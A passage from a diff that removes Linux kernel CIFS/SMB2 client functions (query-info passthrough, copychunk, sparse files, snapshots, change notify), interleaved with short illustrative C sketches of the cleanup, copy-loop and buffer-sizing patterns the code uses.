+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	char __user *arg = (char __user *)p;
+-	struct smb_query_info qi;
+-	struct smb_query_info __user *pqi;
+-	int rc = 0;
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb2_query_info_rsp *qi_rsp = NULL;
+-	struct smb2_ioctl_rsp *io_rsp = NULL;
+-	void *buffer = NULL;
+-	int resp_buftype[3];
+-	struct cifs_open_parms oparms;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_fid fid;
+-	unsigned int size[2];
+-	void *data[2];
+-	int create_options = is_dir ? CREATE_NOT_FILE : CREATE_NOT_DIR;
+-	void (*free_req1_func)(struct smb_rqst *r);
+-
+-	vars = kzalloc(sizeof(*vars), GFP_ATOMIC);
+-	if (vars == NULL)
+-		return -ENOMEM;
+-	rqst = &vars->rqst[0];
+-	rsp_iov = &vars->rsp_iov[0];
+-
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-
+-	if (copy_from_user(&qi, arg, sizeof(struct smb_query_info))) {
+-		rc = -EFAULT;
+-		goto free_vars;
+-	}
+-	if (qi.output_buffer_length > 1024) {
+-		rc = -EINVAL;
+-		goto free_vars;
+-	}
+-
+-	if (!ses || !server) {
+-		rc = -EIO;
+-		goto free_vars;
+-	}
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	if (qi.output_buffer_length) {
+-		buffer = memdup_user(arg + sizeof(struct smb_query_info), qi.output_buffer_length);
+-		if (IS_ERR(buffer)) {
+-			rc = PTR_ERR(buffer);
+-			goto free_vars;
+-		}
+-	}
+-
+-	/* Open */
+-	rqst[0].rq_iov = &vars->open_iov[0];
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-	};
+-
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+-		case FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS:
+-			oparms.desired_access = FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | SYNCHRONIZE;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS:
+-			oparms.desired_access = GENERIC_ALL;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS:
+-			oparms.desired_access = GENERIC_READ;
+-			break;
+-		case FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS:
+-			oparms.desired_access = GENERIC_WRITE;
+-			break;
+-		}
+-	} else if (qi.flags & PASSTHRU_SET_INFO) {
+-		oparms.desired_access = GENERIC_WRITE;
+-	} else {
+-		oparms.desired_access = FILE_READ_ATTRIBUTES | READ_CONTROL;
+-	}
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, path);
+-	if (rc)
+-		goto free_output_buffer;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	/* Query */
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		/* Can eventually relax perm check since server enforces too */
+-		if (!capable(CAP_SYS_ADMIN)) {
+-			rc = -EPERM;
+-			goto free_open_req;
+-		}
+-		rqst[1].rq_iov = &vars->io_iov[0];
+-		rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-		rc = SMB2_ioctl_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
+-				     qi.info_type, buffer, qi.output_buffer_length,
+-				     CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
+-				     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-		free_req1_func = SMB2_ioctl_free;
+-	} else if (qi.flags == PASSTHRU_SET_INFO) {
+-		/* Can eventually relax perm check since server enforces too */
+-		if (!capable(CAP_SYS_ADMIN)) {
+-			rc = -EPERM;
+-			goto free_open_req;
+-		}
+-		if (qi.output_buffer_length < 8) {
+-			rc = -EINVAL;
+-			goto free_open_req;
+-		}
+-		rqst[1].rq_iov = &vars->si_iov[0];
+-		rqst[1].rq_nvec = 1;
+-
+-		/* MS-FSCC 2.4.13 FileEndOfFileInformation */
+-		size[0] = 8;
+-		data[0] = buffer;
+-
+-		rc = SMB2_set_info_init(tcon, server, &rqst[1], COMPOUND_FID, COMPOUND_FID,
+-					current->tgid, FILE_END_OF_FILE_INFORMATION,
+-					SMB2_O_INFO_FILE, 0, data, size);
+-		free_req1_func = SMB2_set_info_free;
+-	} else if (qi.flags == PASSTHRU_QUERY_INFO) {
+-		rqst[1].rq_iov = &vars->qi_iov[0];
+-		rqst[1].rq_nvec = 1;
+-
+-		rc = SMB2_query_info_init(tcon, server,
+-				  &rqst[1], COMPOUND_FID,
+-				  COMPOUND_FID, qi.file_info_class,
+-				  qi.info_type, qi.additional_information,
+-				  qi.input_buffer_length,
+-				  qi.output_buffer_length, buffer);
+-		free_req1_func = SMB2_query_info_free;
+-	} else { /* unknown flags */
+-		cifs_tcon_dbg(VFS, "Invalid passthru query flags: 0x%x\n",
+-			      qi.flags);
+-		rc = -EINVAL;
+-	}
+-
+-	if (rc)
+-		goto free_open_req;
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-	/* Close */
+-	rqst[2].rq_iov = &vars->close_iov[0];
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto free_req_1;
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-	if (rc)
+-		goto out;
+-
+-	/* No need to bump num_remote_opens since handle immediately closed */
+-	if (qi.flags & PASSTHRU_FSCTL) {
+-		pqi = (struct smb_query_info __user *)arg;
+-		io_rsp = (struct smb2_ioctl_rsp *)rsp_iov[1].iov_base;
+-		if (le32_to_cpu(io_rsp->OutputCount) < qi.input_buffer_length)
+-			qi.input_buffer_length = le32_to_cpu(io_rsp->OutputCount);
+-		if (qi.input_buffer_length > 0 &&
+-		    le32_to_cpu(io_rsp->OutputOffset) + qi.input_buffer_length
+-		    > rsp_iov[1].iov_len) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user(&pqi->input_buffer_length,
+-				 &qi.input_buffer_length,
+-				 sizeof(qi.input_buffer_length))) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user((void __user *)pqi + sizeof(struct smb_query_info),
+-				 (const void *)io_rsp + le32_to_cpu(io_rsp->OutputOffset),
+-				 qi.input_buffer_length))
+-			rc = -EFAULT;
+-	} else {
+-		pqi = (struct smb_query_info __user *)arg;
+-		qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+-		if (le32_to_cpu(qi_rsp->OutputBufferLength) < qi.input_buffer_length)
+-			qi.input_buffer_length = le32_to_cpu(qi_rsp->OutputBufferLength);
+-		if (copy_to_user(&pqi->input_buffer_length,
+-				 &qi.input_buffer_length,
+-				 sizeof(qi.input_buffer_length))) {
+-			rc = -EFAULT;
+-			goto out;
+-		}
+-
+-		if (copy_to_user(pqi + 1, qi_rsp->Buffer,
+-				 qi.input_buffer_length))
+-			rc = -EFAULT;
+-	}
+-
+-out:
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	SMB2_close_free(&rqst[2]);
+-free_req_1:
+-	free_req1_func(&rqst[1]);
+-free_open_req:
+-	SMB2_open_free(&rqst[0]);
+-free_output_buffer:
+-	kfree(buffer);
+-free_vars:
+-	kfree(vars);
+-	return rc;
+-}
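/*
 * Illustrative sketch (not part of the patch): smb2_ioctl_query_info()
 * above uses the classic goto unwind ladder -- each acquired resource
 * gets a label, and failures jump to the label that frees everything
 * acquired so far, in reverse order. A minimal standalone version of
 * the pattern:
 */
#include <stdio.h>
#include <stdlib.h>

static int do_work(int fail_at)
{
	int rc = -1;
	char *a, *b = NULL;

	a = malloc(16);
	if (!a)
		return -1;
	if (fail_at == 1)
		goto free_a;	/* b never allocated, skip its cleanup */
	b = malloc(16);
	if (!b)
		goto free_a;
	/* ... use a and b ... */
	rc = 0;
	free(b);
free_a:
	free(a);
	return rc;
}

int main(void)
{
	printf("ok path: %d\n", do_work(0));  /* 0 */
	printf("err path: %d\n", do_work(1)); /* -1, nothing leaked */
	return 0;
}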
+-
+-static ssize_t
+-smb2_copychunk_range(const unsigned int xid,
+-			struct cifsFileInfo *srcfile,
+-			struct cifsFileInfo *trgtfile, u64 src_off,
+-			u64 len, u64 dest_off)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct copychunk_ioctl *pcchunk;
+-	struct copychunk_ioctl_rsp *retbuf = NULL;
+-	struct cifs_tcon *tcon;
+-	int chunks_copied = 0;
+-	bool chunk_sizes_updated = false;
+-	ssize_t bytes_written, total_bytes_written = 0;
+-
+-	pcchunk = kmalloc(sizeof(struct copychunk_ioctl), GFP_KERNEL);
+-	if (pcchunk == NULL)
+-		return -ENOMEM;
+-
+-	cifs_dbg(FYI, "%s: about to call request res key\n", __func__);
+-	/* Request a key from the server to identify the source of the copy */
+-	rc = SMB2_request_res_key(xid, tlink_tcon(srcfile->tlink),
+-				srcfile->fid.persistent_fid,
+-				srcfile->fid.volatile_fid, pcchunk);
+-
+-	/* Note: request_res_key sets res_key null only if rc != 0 */
+-	if (rc)
+-		goto cchunk_out;
+-
+-	/* For now the array is only one chunk long; will make it more flexible later */
+-	pcchunk->ChunkCount = cpu_to_le32(1);
+-	pcchunk->Reserved = 0;
+-	pcchunk->Reserved2 = 0;
+-
+-	tcon = tlink_tcon(trgtfile->tlink);
+-
+-	while (len > 0) {
+-		pcchunk->SourceOffset = cpu_to_le64(src_off);
+-		pcchunk->TargetOffset = cpu_to_le64(dest_off);
+-		pcchunk->Length =
+-			cpu_to_le32(min_t(u64, len, tcon->max_bytes_chunk));
+-
+-		/* Request server copy to target from src identified by key */
+-		kfree(retbuf);
+-		retbuf = NULL;
+-		rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
+-			trgtfile->fid.volatile_fid, FSCTL_SRV_COPYCHUNK_WRITE,
+-			(char *)pcchunk, sizeof(struct copychunk_ioctl),
+-			CIFSMaxBufSize, (char **)&retbuf, &ret_data_len);
+-		if (rc == 0) {
+-			if (ret_data_len !=
+-					sizeof(struct copychunk_ioctl_rsp)) {
+-				cifs_tcon_dbg(VFS, "Invalid cchunk response size\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			if (retbuf->TotalBytesWritten == 0) {
+-				cifs_dbg(FYI, "no bytes copied\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			/*
+-			 * Check if server claimed to write more than we asked
+-			 */
+-			if (le32_to_cpu(retbuf->TotalBytesWritten) >
+-			    le32_to_cpu(pcchunk->Length)) {
+-				cifs_tcon_dbg(VFS, "Invalid copy chunk response\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			if (le32_to_cpu(retbuf->ChunksWritten) != 1) {
+-				cifs_tcon_dbg(VFS, "Invalid num chunks written\n");
+-				rc = -EIO;
+-				goto cchunk_out;
+-			}
+-			chunks_copied++;
+-
+-			bytes_written = le32_to_cpu(retbuf->TotalBytesWritten);
+-			src_off += bytes_written;
+-			dest_off += bytes_written;
+-			len -= bytes_written;
+-			total_bytes_written += bytes_written;
+-
+-			cifs_dbg(FYI, "Chunks %d PartialChunk %d Total %zu\n",
+-				le32_to_cpu(retbuf->ChunksWritten),
+-				le32_to_cpu(retbuf->ChunkBytesWritten),
+-				bytes_written);
+-		} else if (rc == -EINVAL) {
+-			if (ret_data_len != sizeof(struct copychunk_ioctl_rsp))
+-				goto cchunk_out;
+-
+-			cifs_dbg(FYI, "MaxChunks %d BytesChunk %d MaxCopy %d\n",
+-				le32_to_cpu(retbuf->ChunksWritten),
+-				le32_to_cpu(retbuf->ChunkBytesWritten),
+-				le32_to_cpu(retbuf->TotalBytesWritten));
+-
+-			/*
+-			 * Check if this is the first request using these sizes
+-			 * (i.e. check whether the copy succeeded once with the
+-			 * original sizes, and whether the server gave us
+-			 * different sizes after we already updated max sizes
+-			 * on a previous request). If not, why is the server
+-			 * returning an error now?
+-			 */
+-			if ((chunks_copied != 0) || chunk_sizes_updated)
+-				goto cchunk_out;
+-
+-			/* Check that server is not asking us to grow size */
+-			if (le32_to_cpu(retbuf->ChunkBytesWritten) <
+-					tcon->max_bytes_chunk)
+-				tcon->max_bytes_chunk =
+-					le32_to_cpu(retbuf->ChunkBytesWritten);
+-			else
+-				goto cchunk_out; /* server gave us bogus size */
+-
+-			/* No need to change MaxChunks since already set to 1 */
+-			chunk_sizes_updated = true;
+-		} else
+-			goto cchunk_out;
+-	}
+-
+-cchunk_out:
+-	kfree(pcchunk);
+-	kfree(retbuf);
+-	if (rc)
+-		return rc;
+-	else
+-		return total_bytes_written;
+-}
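/*
 * Illustrative sketch (not part of the patch): the server-side copy loop
 * above advances both file offsets by however many bytes the server
 * reports written, clamping each request to the negotiated per-chunk
 * maximum. The model below replays that bookkeeping with a made-up
 * 1 MiB chunk limit and a server that always writes the full chunk.
 */
#include <stdint.h>
#include <stdio.h>

#define MAX_BYTES_CHUNK (1024u * 1024u) /* assumed negotiated limit */

int main(void)
{
	uint64_t src_off = 0, dest_off = 4096, len = 2621440; /* 2.5 MiB */
	uint64_t total = 0;

	while (len > 0) {
		/* ask for at most one chunk */
		uint64_t ask = len < MAX_BYTES_CHUNK ? len : MAX_BYTES_CHUNK;
		uint64_t written = ask; /* a real server may write less */

		src_off += written;
		dest_off += written;
		len -= written;
		total += written;
		printf("copied %llu (total %llu)\n",
		       (unsigned long long)written,
		       (unsigned long long)total);
	}
	return 0;
}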
+-
+-static int
+-smb2_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	return SMB2_flush(xid, tcon, fid->persistent_fid, fid->volatile_fid);
+-}
+-
+-static unsigned int
+-smb2_read_data_offset(char *buf)
+-{
+-	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
+-
+-	return rsp->DataOffset;
+-}
+-
+-static unsigned int
+-smb2_read_data_length(char *buf, bool in_remaining)
+-{
+-	struct smb2_read_rsp *rsp = (struct smb2_read_rsp *)buf;
+-
+-	if (in_remaining)
+-		return le32_to_cpu(rsp->DataRemaining);
+-
+-	return le32_to_cpu(rsp->DataLength);
+-}
+-
+-
+-static int
+-smb2_sync_read(const unsigned int xid, struct cifs_fid *pfid,
+-	       struct cifs_io_parms *parms, unsigned int *bytes_read,
+-	       char **buf, int *buf_type)
+-{
+-	parms->persistent_fid = pfid->persistent_fid;
+-	parms->volatile_fid = pfid->volatile_fid;
+-	return SMB2_read(xid, parms, bytes_read, buf, buf_type);
+-}
+-
+-static int
+-smb2_sync_write(const unsigned int xid, struct cifs_fid *pfid,
+-		struct cifs_io_parms *parms, unsigned int *written,
+-		struct kvec *iov, unsigned long nr_segs)
+-{
+-
+-	parms->persistent_fid = pfid->persistent_fid;
+-	parms->volatile_fid = pfid->volatile_fid;
+-	return SMB2_write(xid, parms, written, iov, nr_segs);
+-}
+-
+-/* Set or clear the SPARSE_FILE attribute based on value passed in setsparse */
+-static bool smb2_set_sparse(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifsFileInfo *cfile, struct inode *inode, __u8 setsparse)
+-{
+-	struct cifsInodeInfo *cifsi;
+-	int rc;
+-
+-	cifsi = CIFS_I(inode);
+-
+-	/* if file already sparse don't bother setting sparse again */
+-	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && setsparse)
+-		return true; /* already sparse */
+-
+-	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) && !setsparse)
+-		return true; /* already not sparse */
+-
+-	/*
+-	 * Can't check for sparse support on share the usual way via the
+-	 * FS attribute info (FILE_SUPPORTS_SPARSE_FILES) on the share
+-	 * since Samba server doesn't set the flag on the share, yet
+-	 * supports the set sparse FSCTL and returns sparse correctly
+-	 * in the file attributes. If we fail setting sparse though we
+-	 * mark that server does not support sparse files for this share
+-	 * to avoid repeatedly sending the unsupported fsctl to server
+-	 * if the file is repeatedly extended.
+-	 */
+-	if (tcon->broken_sparse_sup)
+-		return false;
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid, FSCTL_SET_SPARSE,
+-			&setsparse, 1, CIFSMaxBufSize, NULL, NULL);
+-	if (rc) {
+-		tcon->broken_sparse_sup = true;
+-		cifs_dbg(FYI, "set sparse rc = %d\n", rc);
+-		return false;
+-	}
+-
+-	if (setsparse)
+-		cifsi->cifsAttrs |= FILE_ATTRIBUTE_SPARSE_FILE;
+-	else
+-		cifsi->cifsAttrs &= (~FILE_ATTRIBUTE_SPARSE_FILE);
+-
+-	return true;
+-}
+-
+-static int
+-smb2_set_file_size(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, __u64 size, bool set_alloc)
+-{
+-	__le64 eof = cpu_to_le64(size);
+-	struct inode *inode;
+-
+-	/*
+-	 * If extending the file by more than one page, make it sparse. Many
+-	 * Linux filesystems make files sparse by default when extending via
+-	 * ftruncate.
+-	 */
+-	inode = d_inode(cfile->dentry);
+-
+-	if (!set_alloc && (size > inode->i_size + 8192)) {
+-		__u8 set_sparse = 1;
+-
+-		/* whether set sparse succeeds or not, extend the file */
+-		smb2_set_sparse(xid, tcon, cfile, inode, set_sparse);
+-	}
+-
+-	return SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			    cfile->fid.volatile_fid, cfile->pid, &eof);
+-}
+-
+-static int
+-smb2_duplicate_extents(const unsigned int xid,
+-			struct cifsFileInfo *srcfile,
+-			struct cifsFileInfo *trgtfile, u64 src_off,
+-			u64 len, u64 dest_off)
+-{
+-	int rc;
+-	unsigned int ret_data_len;
+-	struct inode *inode;
+-	struct duplicate_extents_to_file dup_ext_buf;
+-	struct cifs_tcon *tcon = tlink_tcon(trgtfile->tlink);
+-
+-	/* servers advertise duplicate extent support with this flag */
+-	if ((le32_to_cpu(tcon->fsAttrInfo.Attributes) &
+-	     FILE_SUPPORTS_BLOCK_REFCOUNTING) == 0)
+-		return -EOPNOTSUPP;
+-
+-	dup_ext_buf.VolatileFileHandle = srcfile->fid.volatile_fid;
+-	dup_ext_buf.PersistentFileHandle = srcfile->fid.persistent_fid;
+-	dup_ext_buf.SourceFileOffset = cpu_to_le64(src_off);
+-	dup_ext_buf.TargetFileOffset = cpu_to_le64(dest_off);
+-	dup_ext_buf.ByteCount = cpu_to_le64(len);
+-	cifs_dbg(FYI, "Duplicate extents: src off %lld dst off %lld len %lld\n",
+-		src_off, dest_off, len);
+-
+-	inode = d_inode(trgtfile->dentry);
+-	if (inode->i_size < dest_off + len) {
+-		rc = smb2_set_file_size(xid, tcon, trgtfile, dest_off + len, false);
+-		if (rc)
+-			goto duplicate_extents_out;
+-
+-		/*
+-		 * Although also could set plausible allocation size (i_blocks)
+-		 * here in addition to setting the file size, in reflink
+-		 * it is likely that the target file is sparse. Its allocation
+-		 * size will be queried on next revalidate, but it is important
+-		 * to make sure that file's cached size is updated immediately
+-		 */
+-		cifs_setsize(inode, dest_off + len);
+-	}
+-	rc = SMB2_ioctl(xid, tcon, trgtfile->fid.persistent_fid,
+-			trgtfile->fid.volatile_fid,
+-			FSCTL_DUPLICATE_EXTENTS_TO_FILE,
+-			(char *)&dup_ext_buf,
+-			sizeof(struct duplicate_extents_to_file),
+-			CIFSMaxBufSize, NULL,
+-			&ret_data_len);
+-
+-	if (ret_data_len > 0)
+-		cifs_dbg(FYI, "Non-zero response length in duplicate extents\n");
+-
+-duplicate_extents_out:
+-	return rc;
+-}
+-
+-static int
+-smb2_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	return SMB2_set_compression(xid, tcon, cfile->fid.persistent_fid,
+-			    cfile->fid.volatile_fid);
+-}
+-
+-static int
+-smb3_set_integrity(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	struct fsctl_set_integrity_information_req integr_info;
+-	unsigned int ret_data_len;
+-
+-	integr_info.ChecksumAlgorithm = cpu_to_le16(CHECKSUM_TYPE_UNCHANGED);
+-	integr_info.Flags = 0;
+-	integr_info.Reserved = 0;
+-
+-	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_SET_INTEGRITY_INFORMATION,
+-			(char *)&integr_info,
+-			sizeof(struct fsctl_set_integrity_information_req),
+-			CIFSMaxBufSize, NULL,
+-			&ret_data_len);
+-
+-}
+-
+-/* GMT Token is @GMT-YYYY.MM.DD-HH.MM.SS Unicode which is 48 bytes + null */
+-#define GMT_TOKEN_SIZE 50
+-
+-#define MIN_SNAPSHOT_ARRAY_SIZE 16 /* See MS-SMB2 section 3.3.5.15.1 */
+-
+-/*
+- * Input buffer contains (empty) struct smb_snapshot array with size filled in
+- * For output see struct SRV_SNAPSHOT_ARRAY in MS-SMB2 section 2.2.32.2
+- */
+-static int
+-smb3_enum_snapshots(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, void __user *ioc_buf)
+-{
+-	char *retbuf = NULL;
+-	unsigned int ret_data_len = 0;
+-	int rc;
+-	u32 max_response_size;
+-	struct smb_snapshot_array snapshot_in;
+-
+-	/*
+-	 * On the first query to enumerate the list of snapshots available
+-	 * for this volume the buffer begins with 0 (number of snapshots
+-	 * which can be returned is zero since at that point we do not know
+-	 * how big the buffer needs to be). On the second query,
+-	 * it (ret_data_len) is set to number of snapshots so we can
+-	 * know to set the maximum response size larger (see below).
+-	 */
+-	if (get_user(ret_data_len, (unsigned int __user *)ioc_buf))
+-		return -EFAULT;
+-
+-	/*
+-	 * Note that for snapshot queries, servers like Azure expect the
+-	 * first query to be of minimal size (just used to get the number/size
+-	 * of previous versions) so response size must be specified as EXACTLY
+-	 * sizeof(struct snapshot_array) which is 16 when rounded up to multiple
+-	 * of eight bytes.
+-	 */
+-	if (ret_data_len == 0)
+-		max_response_size = MIN_SNAPSHOT_ARRAY_SIZE;
+-	else
+-		max_response_size = CIFSMaxBufSize;
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_SRV_ENUMERATE_SNAPSHOTS,
+-			NULL, 0 /* no input data */, max_response_size,
+-			(char **)&retbuf,
+-			&ret_data_len);
+-	cifs_dbg(FYI, "enum snaphots ioctl returned %d and ret buflen is %d\n",
+-			rc, ret_data_len);
+-	if (rc)
+-		return rc;
+-
+-	if (ret_data_len && (ioc_buf != NULL) && (retbuf != NULL)) {
+-		/* Fixup buffer */
+-		if (copy_from_user(&snapshot_in, ioc_buf,
+-		    sizeof(struct smb_snapshot_array))) {
+-			rc = -EFAULT;
+-			kfree(retbuf);
+-			return rc;
+-		}
+-
+-		/*
+-		 * Check for min size, ie not large enough to fit even one GMT
+-		 * token (snapshot).  On the first ioctl some users may pass in
+-		 * smaller size (or zero) to simply get the size of the array
+-		 * so the user space caller can allocate sufficient memory
+-		 * and retry the ioctl again with larger array size sufficient
+-		 * to hold all of the snapshot GMT tokens on the second try.
+-		 */
+-		if (snapshot_in.snapshot_array_size < GMT_TOKEN_SIZE)
+-			ret_data_len = sizeof(struct smb_snapshot_array);
+-
+-		/*
+-		 * We return struct SRV_SNAPSHOT_ARRAY, followed by
+-		 * the snapshot array (of 50 byte GMT tokens) each
+-		 * representing an available previous version of the data
+-		 */
+-		if (ret_data_len > (snapshot_in.snapshot_array_size +
+-					sizeof(struct smb_snapshot_array)))
+-			ret_data_len = snapshot_in.snapshot_array_size +
+-					sizeof(struct smb_snapshot_array);
+-
+-		if (copy_to_user(ioc_buf, retbuf, ret_data_len))
+-			rc = -EFAULT;
+-	}
+-
+-	kfree(retbuf);
+-	return rc;
+-}
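
/*
 * The snapshot enumeration above uses a two-pass sizing handshake:
 * probe with a minimal buffer to learn how much space is needed, then
 * retry with a buffer of that size. A generic userspace model of the
 * same pattern follows; query_fn is a hypothetical stand-in for the
 * FSCTL_SRV_ENUMERATE_SNAPSHOTS ioctl, not a real API.
 */
#include <stdlib.h>

typedef int (*query_fn)(void *buf, unsigned int buflen,
			unsigned int *needed);

static void *query_with_retry(query_fn q, unsigned int *out_len)
{
	unsigned int needed = 0;
	void *buf;

	/* first pass: minimal probe whose only job is to fill 'needed' */
	q(NULL, 0, &needed);
	if (needed == 0)
		return NULL;
	buf = malloc(needed);
	if (!buf)
		return NULL;
	/* second pass: the real query with a sufficiently large buffer */
	if (q(buf, needed, &needed) != 0) {
		free(buf);
		return NULL;
	}
	*out_len = needed;
	return buf;
}
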
+-
+-
+-
+-static int
+-smb3_notify(const unsigned int xid, struct file *pfile,
+-	    void __user *ioc_buf, bool return_changes)
+-{
+-	struct smb3_notify_info notify;
+-	struct smb3_notify_info __user *pnotify_buf;
+-	struct dentry *dentry = pfile->f_path.dentry;
+-	struct inode *inode = file_inode(pfile);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct cifs_tcon *tcon;
+-	const unsigned char *path;
+-	char *returned_ioctl_info = NULL;
+-	void *page = alloc_dentry_path();
+-	__le16 *utf16_path = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	int rc = 0;
+-	__u32 ret_len = 0;
+-
+-	path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(path)) {
+-		rc = PTR_ERR(path);
+-		goto notify_exit;
+-	}
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (utf16_path == NULL) {
+-		rc = -ENOMEM;
+-		goto notify_exit;
+-	}
+-
+-	if (return_changes) {
+-		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify_info))) {
+-			rc = -EFAULT;
+-			goto notify_exit;
+-		}
+-	} else {
+-		if (copy_from_user(&notify, ioc_buf, sizeof(struct smb3_notify))) {
+-			rc = -EFAULT;
+-			goto notify_exit;
+-		}
+-		notify.data_len = 0;
+-	}
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
+-	if (rc)
+-		goto notify_exit;
+-
+-	rc = SMB2_change_notify(xid, tcon, fid.persistent_fid, fid.volatile_fid,
+-				notify.watch_tree, notify.completion_filter,
+-				notify.data_len, &returned_ioctl_info, &ret_len);
+-
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-
+-	cifs_dbg(FYI, "change notify for path %s rc %d\n", path, rc);
+-	if (return_changes && (ret_len > 0) && (notify.data_len > 0)) {
+-		if (ret_len > notify.data_len)
+-			ret_len = notify.data_len;
+-		pnotify_buf = (struct smb3_notify_info __user *)ioc_buf;
+-		if (copy_to_user(pnotify_buf->notify_data, returned_ioctl_info, ret_len))
+-			rc = -EFAULT;
+-		else if (copy_to_user(&pnotify_buf->data_len, &ret_len, sizeof(ret_len)))
+-			rc = -EFAULT;
+-	}
+-	kfree(returned_ioctl_info);
+-notify_exit:
+-	free_dentry_path(page);
+-	kfree(utf16_path);
+-	return rc;
+-}
+-
+-static int
+-smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *path, struct cifs_sb_info *cifs_sb,
+-		     struct cifs_fid *fid, __u16 search_flags,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	__le16 *utf16_path;
+-	struct smb_rqst rqst[2];
+-	struct kvec rsp_iov[2];
+-	int resp_buftype[2];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qd_iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
+-	int rc, flags = 0;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct smb2_query_directory_rsp *qd_rsp = NULL;
+-	struct smb2_create_rsp *op_rsp = NULL;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int retry_count = 0;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
